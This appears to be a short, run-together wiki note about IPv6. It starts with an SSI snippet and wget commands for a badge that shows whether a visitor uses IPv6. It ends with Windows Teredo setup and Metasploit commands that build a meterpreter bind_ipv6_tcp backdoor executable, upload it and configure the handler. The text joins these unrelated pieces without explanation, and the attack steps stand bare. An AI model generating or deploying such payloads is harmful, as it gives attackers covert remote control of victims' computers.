~~META: status = active &relation firstimage = :project:ipv6-badge-blk-128-trans.png ~~
The project is currently in the planning stage.
Check your web server support SSI
SetEnvIf Server_Addr "^2001:" IPV6
wget -4 http://www.cznog.eu/images/checkicon.php -O ./images/ipv4.png wget -6 http://www.cznog.eu/images/checkicon.php -O ./images/ipv6.png
<!--#if expr="$IPV6"--><img src="/images/ipv6.png" alt="IPv6 smile" /> <!--#else --> <img src="/images/ipv4.png" alt="IPv4 sad" /> <!--#endif -->
Finding IPv6 hosts
http://www.abclinuxu.cz/clanky/architektura-ipv6-adresace-uzlu-1
int ipv6 install netsh int ipv6 set teredo [enterpriseclient|client] #(enterpriseclient gives you and public ip) netsh int ipv6 show teredo # we need qualified State msfpayload windows/meterpreter/bind_ipv6_tcp LPORT=1337 X > bind.exe upload bind.exe msf exploit(handler) > set PAYLOAD windows/meterpreter/bind_ipv6_tcp